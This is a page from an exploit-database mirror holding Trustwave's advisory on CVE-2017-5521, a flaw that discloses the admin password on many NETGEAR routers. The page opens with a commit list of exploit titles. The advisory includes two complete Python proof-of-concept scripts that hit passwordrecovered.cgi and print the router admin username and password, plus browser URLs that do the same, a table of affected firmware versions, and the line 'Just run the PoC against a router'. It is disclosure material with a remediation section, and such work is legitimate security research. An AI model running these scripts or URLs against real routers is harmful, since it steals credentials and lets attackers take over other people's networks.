bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/hardware/webapps/41205.py
Offensive Security 1a4e6f50a9 DB: 2017-02-01 
65 new exploits

Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow

Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow

PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow

32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)

Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service

ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)
ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)

Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service

VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read

Samba < 3.6.2 (x86) - Denial of Serviec (PoC)

Adobe Flash - Bad Dereference at 0x23c on Linux x64
Adobe Flash (Linux x64) - Bad Dereference at 0x23c

Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited

Core FTP Server 32-bit Build 587 - Heap Overflow

Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)
Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)

RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation
RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation

Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation
Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation
Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)
Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation
Wireless Tools 26 (IWConfig) - Privilege Escalation
Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation

Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure
Rocks Clusters 4.1 - (umount-loop) Privilege Escalation
Rocks Clusters 4.1 - (mount-loop) Privilege Escalation
Rocks Clusters 4.1 - 'umount-loop' Privilege Escalation
Rocks Clusters 4.1 - 'mount-loop' Privilege Escalation

PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure

Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation

Postfix 2.6-20080814 - (symlink) Privilege Escalation
Postfix 2.6-20080814 - 'symlink' Privilege Escalation

Oracle Database Vault - ptrace(2) Privilege Escalation
Oracle Database Vault - 'ptrace(2)' Privilege Escalation

Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit
Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation

GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation)
GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation

Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)

Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)
Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)

VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)

PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation
PolicyKit polkit-1 < 0.101 - Privilege Escalation
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail 8.10.1) Capabilities Privilege Escalation (2)
QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation
QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation

Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure

Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)
Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)

MySQL 3.23.x - mysqld Privilege Escalation
MySQL 3.23.x - 'mysqld' Privilege Escalation
Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation
MTools 3.9.x - MFormat Privilege Escalation
Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation
MTools 3.9.x - 'MFormat' Privilege Escalation

Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)

sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass
sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation

Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)

ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation
ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation

Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)

LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure

Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation

Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)

Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation

Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)

TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure

Linux Kernel 3.13 - Privilege Escalation PoC (SGID)
Linux Kernel 3.13 -  (SGID) Privilege Escalation (PoC)

OSSEC 2.8 - hosts.deny Privilege Escalation
OSSEC 2.8 - 'hosts.deny' Privilege Escalation

Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition
Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation
Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)
Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)
Linux espfix64 -  (Nested NMIs Interrupting) Privilege Escalation
Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)

RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation
RHEL 7.0/7.1 - 'abrt/sosreport' Privilege Escalation

MySQL 5.5.45 (x64) - Local Credentials Disclosure

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation

ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation

Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)
Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)

Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak

Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation

Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)

Viscosity 1.6.7 - Privilege Escalation

BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution
BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution

Solaris /bin/login (SPARC/x86) - Remote Code Execution

gpsdrive 2.09 (x86) - (friendsd2) Remote Format String

PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)

dproxy-nexgen (Linux/x86) - Buffer Overflow
dproxy-nexgen (Linux x86) - Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)

Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)

AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)

32bit FTP Client - Stack Buffer Overflow (Metasploit)

Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)
Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)

Apache (Windows x86) - Chunked Encoding (Metasploit)

PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)

CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)
Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)

Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)

Webmin 0.x - RPC Function Privilege Escalation
Webmin 0.x - 'RPC' Function Privilege Escalation

Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit

Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit
Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit

technote 7.2 - Remote File Inclusion
Technote 7.2 - Remote File Inclusion
JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access
JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass
JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting
Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access
Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass
Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting

JAWS 0.2/0.3/0.4 - ControlPanel.php SQL Injection
Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection

JAWS Glossary 0.4/0.5 - Cross-Site Scripting
Jaws Glossary 0.4/0.5 - Cross-Site Scripting

JAWS 0.x - Remote File Inclusion
Jaws 0.x - Remote File Inclusion

FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities
Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities

Multiple Netgear Routers - Password Disclosure
Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
Netman 204 - Backdoor Account / Password Reset
2017-02-01 05:01:19 +00:00

358 lines
No EOL
14 KiB
Python
Executable file
Raw Blame History

Trustwave SpiderLabs Security Advisory TWSL2017-003:
Multiple Vulnerabilities in NETGEAR Routers
Published: 01/30/2017
Version: 1.0
Vendor: NETGEAR (http://www.netgear.com/)
Product: Multiple products
Finding 1: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected:
# AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
# D6400 V1.0.0.34_1.3.34
# D6400 V1.0.0.38_1.1.38
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.30_10.0.73
# R6700 V1.0.1.14_10.0.29 (Latest beta)
# R6700 V1.0.0.26_10.0.26 (Latest stable)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.26_1.0.41
# R8500 V1.0.0.56_1.0.28
# R8500 V1.0.0.20_1.0.11
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.29_1.0.29
# VEGN2610 V1.0.0.27_1.0.27
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.42_1.0.25
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# WN3100RP V1.0.0.14_1.0.19 (Latest)
# WN3100RP V1.0.0.6_1.0.12
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13
Product description:
Multiple Netgear Routers
Many Netgear routers are prone to password disclosure via simple crafted
requests to the web management server. The bug is exploitable remotely if the
remote management option is set and can also be exploited given access to the
router over LAN or WLAN.
When trying to access the web panel a user is asked to authenticate, if the
authentication is cancelled and password recovery is not enabled, the user is
redirected to a page which exposes a password recovery token. If a user
supplies the correct token to the page
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
enabled), they will receive the admin password for the router.
If password recovery is set the exploit will fail, as it will ask the user for the recovery
questions which were previously set when enabling the feature, this is
persistent, even after disabling the recovery option the exploit will fail,
because the router will ask for the security questions.
This can easily be reproduced using the attached poc, or by sending these two
simple requests via the browser:
1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token
2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)
## netgore.py
import sys
import requests
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage - get token
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
r = requests.get(url)
except:
url = 'https://' + ip + ':' + port + '/'
r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
print "Attcking: " + model[13:-1]
else:
print "not a netgear router"
sys.exit(0)
token = scrape(r.text, 'unauth.cgi?id=', '\"')
if token == 'i_dont_speak_english':
print "not vulnerable"
sys.exit(0)
print "token found: " + token
#2nd stage - pass the token - get the password
url = url + 'passwordrecovered.cgi?id=' + token
r = requests.post(url, verify=False)
#profit
if r.text.find('left\">') != -1:
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
username = scrape(username, '>', '\'')
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
password = scrape(password, '>', '\'')
if username == "i_dont_speak_english":
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
print "not vulnerable becuse password recovery IS set"
sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;","#")
password = password.replace("&","&")
print "user: " + username
print "pass: " + password
================================
Just run the PoC against a router to get the credentials if it is vulnerable.
Finding 2: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected:
# AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6300 V1.0.0.96_1.1.96 (Latest)
# D6300B V1.0.0.36_1.0.36
# D6300B V1.0.0.32_1.0.32
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
# DGN2200v4 V1.0.0.66_1.0.66
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.56_1.0.43 (Latest)
# R6200 V1.0.1.52_1.0.41
# R6200 V1.0.1.48_1.0.37
# R6200v2 V1.0.3.10_10.1.10 (Latest)
# R6200v2 V1.0.1.20_1.0.18
# R6250 V1.0.4.6_10.1.12 (Latest beta)
# R6250 V1.0.4.2_10.1.10 (Latest stable)
# R6250 V1.0.1.84_1.0.78
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
# R6700 V1.0.0.26_10.0.26 (Latest)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R7000 V1.0.4.30_1.1.67
# R7900 V1.0.1.8_10.0.14 (Latest beta)
# R7900 V1.0.1.4_10.0.12 (Latest stable)
# R7900 V1.0.0.10_10.0.7
# R7900 V1.0.0.8_10.0.5
# R7900 V1.0.0.6_10.0.4
# R8000 V1.0.3.26_1.1.18 (Latest beta)
# R8000 V1.0.3.4_1.1.2 (Latest stable)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.30_1.0.43
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.27_1.0.27
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
# VEVG2660 V1.0.0.23_1.0.23
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
# WNDR3400v3 V1.0.1.2_1.0.51
# WNDR3400v3 V1.0.0.22_1.0.29
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500 V1.0.1.6_1.0.24
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.50_1.0.30
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
# WNR3500Lv2 V1.2.0.32_40.0.74
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13
Many Netgear routers are prone to password disclosure via simple crafted
request to the web management server. The bug is exploitable remotely if the
remote management option is set and can also be exploited given access to the
router over LAN or WLAN.
Netgear routers have an option to restore forgotten password via 2 security
questions. If the recovery option is disabled (which is the default), it is
still possible to recover the password by sending a correct token to the
recovery page.
If a user supplies the correct token to the page
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
enabled), they will receive the admin password for the router. If password
recovery is set the exploit will fail, as it will ask the user for the recovery
questions which were previously set when enabling the feature, this is
persistent, even after disabling the recovery option, the exploit will fail,
because the router will ask for the security questions.
This mechanism does not work correctly on the very first request to
"passwordrecovered.cgi" and the token is not properly checked, this means that
any TOKEN value will result in disclosure of the password.
The issue occurs after every reboot of the router.
This can easily be reproduced using the attached poc, or by sending a simple
request via the browser:
1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)
## netgore2.py
import sys
import requests
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
r = requests.get(url)
except:
url = 'https://' + ip + ':' + port + '/'
r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
print "Attcking: " + model[13:-1]
else:
print "not a netgear router"
sys.exit(0)
#2nd stage
url = url + 'passwordrecovered.cgi?id=get_rekt'
try:
r = requests.post(url, verify=False)
except:
print "not vulnerable router"
sys.exit(0)
#profit
if r.text.find('left\">') != -1:
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
username = scrape(username, '>', '\'')
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
password = scrape(password, '>', '\'')
if username == "i_dont_speak_english":
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"
sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;","#")
password = password.replace("&","&")
print "user: " + username
print "pass: " + password
================================
Just run the PoC against a router to get the credentials if it is vulnerable.
Remediation Steps:
Please see NETGEAR's KBA for list of firmware patches for various models. As a
workaround, the bug only works when password recovery is NOT set. If you do set
password recovery this is not exploitable.
Revision History:
04/06/2016 - Vulnerability disclosed to vendor
04/19/2016 - Request for update and received confirmation of receipt of the advisories
05/18/2016 - Request for update; no response
07/14/2016 - Request for update
07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage
10/17/2016 - Request for update
12/15/2016 - Notice of intent to publish advisories
01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd
01/30/2017 - Advisory published
References
1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html
2. https://www.exploit-db.com/exploits/32883/
3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
Reference in a new issue View git blame Copy permalink